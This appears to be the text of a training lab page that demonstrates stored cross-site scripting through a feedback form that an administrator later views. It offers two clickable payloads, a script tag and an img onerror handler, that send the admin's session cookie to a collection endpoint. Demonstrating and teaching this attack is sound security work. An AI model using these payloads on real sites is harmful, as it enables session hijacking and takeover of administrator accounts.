We value your feedback

Anyone can submit — no login required. An administrator reviews messages in their dashboard.

Attacker payloads (click to fill the message — these steal the admin's session cookie):

<script>new Image().src='/api/collect?c='+encodeURIComponent(document.cookie)</script> <img src=x onerror="new Image().src='/api/collect?c='+document.cookie">
Response will appear here…

Next: an admin logs in and views this feedback → admin login. Keep the attacker console open in another tab.